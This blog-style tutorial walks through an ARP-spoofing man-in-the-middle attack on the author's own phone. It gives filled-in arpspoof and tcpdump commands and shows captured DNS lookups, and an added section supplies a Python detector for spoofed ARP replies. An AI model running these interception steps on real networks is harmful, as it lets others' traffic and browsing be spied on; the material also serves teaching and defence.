2025-03-4 Hacking your Wi-Fi II, MiTM attacks

Today we will be performing a MiTM (Man-in-the-Middle) attack using the dsniff tool suite. Let's get started.

Here is our network information:

Gateway IP: 10.1.1.1
Target IP: 10.1.1.121
Attacker IP: 10.1.1.182

Step 1 Installing dependencies

Let's start by installing dsniff. I run Gentoo Linux, so I will run:

sudo emerge dsniff

We should also make sure we have a network sniffer such as tcpdump or Wireshark.

This should give us all of the tools we need to perform the attack; it is quite simple.

Step 2 Running arpspoof

Next we will run the arpspoof tool. Here is the syntax of the command we will run:

sudo arpspoof -i <INTERFACE> -t <TARGET> <GATEWAY>

To find our interface and MAC, let's run ifconfig. I know my wireless interface is called wlan0, so I will look for that entry in the output.

Here we see:

wlan0: flags=4419<UP,BROADCAST,RUNNING,PROMISC,MULTICAST>  mtu 1500
    inet 10.1.1.182  netmask 255.255.255.0  broadcast 10.0.0.255
    ether b8:1e:a4:61:01:ab  txqueuelen 1000  (Ethernet)

Note: I removed most of the lines to show only the important information.

Now that we have noted our IP, MAC and interface, we will run arpspoof. With the proper arguments filled in, the command is:

sudo arpspoof -i wlan0 -t 10.1.1.121 10.1.1.1

If everything is working, we should see output similar to this:

b8:1e:a4:61:1:ab 8a:5e:a1:4:ec:cd 0806 42: arp reply 10.1.1.1 is-at b8:1e:a4:61:1:ab
b8:1e:a4:61:1:ab 8a:5e:a1:4:ec:cd 0806 42: arp reply 10.1.1.1 is-at b8:1e:a4:61:1:ab

Here we see my computer's MAC address (b8:1e:a4:61:1:ab, the ether field from ifconfig above) being advertised to the target's MAC (8a:5e:a1:4:ec:cd) as the address of the gateway 10.1.1.1, so the target now sends its gateway traffic to my machine.
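The same reply lines are what a defender would watch for. This is an added example, not code from the post or from dsniff: it parses ARP replies in the exact format printed above and flags an IP whose announced MAC changes, and a single MAC that answers for more than one IP. The gateway MAC 00:11:22:33:44:55 and the sample lines are constructed.

```python
import re
from collections import defaultdict

# One ARP reply line as arpspoof / tcpdump -e print it (format from the post):
# "<src mac> <dst mac> 0806 <len>: arp reply <ip> is-at <mac>"
ARP_REPLY = re.compile(
    r"^(?P<src>[0-9a-f:]+) (?P<dst>[0-9a-f:]+) 0806 \d+: arp reply "
    r"(?P<ip>\d+(?:\.\d+){3}) is-at (?P<mac>[0-9a-f:]+)$", re.IGNORECASE)

def norm_mac(mac):
    """Zero-pad octets so 'b8:1e:a4:61:1:ab' equals 'b8:1e:a4:61:01:ab'."""
    return ":".join(o.zfill(2) for o in mac.lower().split(":"))

def detect_arp_spoof(lines, trusted=None):
    """Scan ARP reply lines and return a list of alert strings.

    trusted: optional {ip: mac} of known-good bindings (e.g. the gateway's
    real MAC recorded from a clean capture). An alert fires when an IP is
    announced with a MAC that differs from its trusted or first-seen
    binding, and when one MAC claims to own several IPs (a MiTM that
    poisons both the target and the gateway looks exactly like that).
    """
    bindings = {ip: norm_mac(mac) for ip, mac in (trusted or {}).items()}
    claims = defaultdict(set)   # mac -> set of IPs it has claimed
    alerts = []
    for line in lines:
        m = ARP_REPLY.match(line.strip())
        if not m:
            continue
        ip, mac = m["ip"], norm_mac(m["mac"])
        claims[mac].add(ip)
        known = bindings.setdefault(ip, mac)
        if known != mac:
            alerts.append(f"{ip} binding changed {known} -> {mac}")
    for mac, ips in claims.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims multiple IPs: {sorted(ips)}")
    return alerts

# Constructed sample: one genuine reply from the (made-up) gateway MAC, the
# two spoofed replies exactly as arpspoof printed them in the post, and a
# reverse spoof telling the gateway that the target is at the attacker's MAC.
SAMPLE_LINES = [
    "00:11:22:33:44:55 8a:5e:a1:4:ec:cd 0806 42: arp reply 10.1.1.1 is-at 00:11:22:33:44:55",
    "b8:1e:a4:61:1:ab 8a:5e:a1:4:ec:cd 0806 42: arp reply 10.1.1.1 is-at b8:1e:a4:61:1:ab",
    "b8:1e:a4:61:1:ab 8a:5e:a1:4:ec:cd 0806 42: arp reply 10.1.1.1 is-at b8:1e:a4:61:1:ab",
    "b8:1e:a4:61:1:ab 00:11:22:33:44:55 0806 42: arp reply 10.1.1.121 is-at b8:1e:a4:61:1:ab",
]

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_LINES):
        print("ALERT:", alert)
```

On a real network the input would be lines from tcpdump -e -i wlan0 arp, and the trusted table the gateway binding you recorded beforehand; the same check is what static ARP entries or switch-side dynamic ARP inspection enforce.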

Step 3 Filtering and monitoring

To monitor the victim (my phone), we can run:

sudo tcpdump -i wlan0 host 10.1.1.121 and not arp

Note: I filtered out ARP traffic since we can already see it in the arpspoof output. Here is some example output:

14:38:41.865299 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-connect._tcp.local. (45)
14:38:41.865922 IP 10.1.1.121.XXXXX > 239.255.255.250.1900: UDP, length 125
14:38:43.913433 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-connect._tcp.local. (45)
14:38:43.914014 IP 10.1.1.121.XXXXX > 239.255.255.250.1900: UDP, length 125
14:38:45.820351 IP 10.1.1.121.XXXXX > 30.224.186.35.bc.googleusercontent.com.https: Flags [FP.], seq XXXXXXXX:XXXXXXXX, ack XXXXXXXX, win XX, options [nop,nop,TS val XXXXXXXXX ecr XXXXXXXXX], length 569
14:38:45.961503 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-connect._tcp.local. (45)
14:38:45.962058 IP 10.1.1.121.XXXXX > 239.255.255.250.1900: UDP, length 125
14:38:46.077329 IP 10.1.1.121.XXXXX > 9.224.186.35.bc.googleusercontent.com.https: Flags [FP.], seq XXXXXXXX:XXXXXXXX, ack XXXXXXXX, win XX, options [nop,nop,TS val XXXXXXXXX ecr XXXXXXXXX], length 577
14:38:46.167247 IP 10.1.1.121.mdns > mdns.mcast.net.mdns: 0 PTR (QM)? _spotify-social-listening._tcp.local. (54)

Here we see some requests being made by my phone; from the mDNS queries we can tell the target is using Spotify. We can also filter for DNS requests only and monitor which sites the victim is visiting.

Let's run:

sudo tcpdump -i wlan0 host 10.1.1.121 and port 53

Here we see every site my phone visits! (The names are visible because the phone sends plain DNS to the gateway; a client using encrypted DNS such as DoH or DoT would hide the query names from this filter, although not the connections that follow.)

listening on wlan0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
15:01:31.084186 IP 10.1.1.121.58664 > 10.1.1.1.domain: 12467+ A? www.google.com. (32)
15:01:36.042848 IP 10.1.1.121.48772 > 10.1.1.1.domain: 59773+ A? www.google.com. (32)
15:01:40.999410 IP 10.1.1.121.13959 > 10.1.1.1.domain: 40908+ A? improving.duckduckgo.com. (42)
15:01:41.014103 IP 10.1.1.121.48772 > 10.1.1.1.domain: 59773+ A? www.google.com. (32)
15:01:43.065248 IP 10.1.1.121.30781 > 10.1.1.1.domain: 27373+ A? api.account.samsung.com. (41)
15:01:43.454198 IP 10.1.1.121.30847 > 10.1.1.1.domain: 14313+ A? fonts.googleapis.com. (38)
15:01:43.775948 IP 10.1.1.121.44489 > 10.1.1.1.domain: 12907+ A? fonts.gstatic.com. (35)
15:01:45.073988 IP 10.1.1.121.31649 > 10.1.1.1.domain: 60754+ A? asrch.org. (27)
15:01:45.197287 IP 10.1.1.121.18580 > 10.1.1.1.domain: 21491+ A? www.asrch.org. (31)
15:01:45.979170 IP 10.1.1.121.13959 > 10.1.1.1.domain: 40908+ A? improving.duckduckgo.com. (42)
15:01:46.034599 IP 10.1.1.121.10505 > 10.1.1.1.domain: 14048+ A? www.google.com. (32)
15:01:48.071785 IP 10.1.1.121.30781 > 10.1.1.1.domain: 27373+ A? api.account.samsung.com. (41)
15:01:48.456325 IP 10.1.1.121.30847 > 10.1.1.1.domain: 14313+ A? fonts.googleapis.com. (38)
15:01:48.782880 IP 10.1.1.121.44489 > 10.1.1.1.domain: 12907+ A? fonts.gstatic.com. (35)
15:01:49.478537 IP 10.1.1.121.31587 > 10.1.1.1.domain: 4311+ A? fonts.googleapis.com. (38)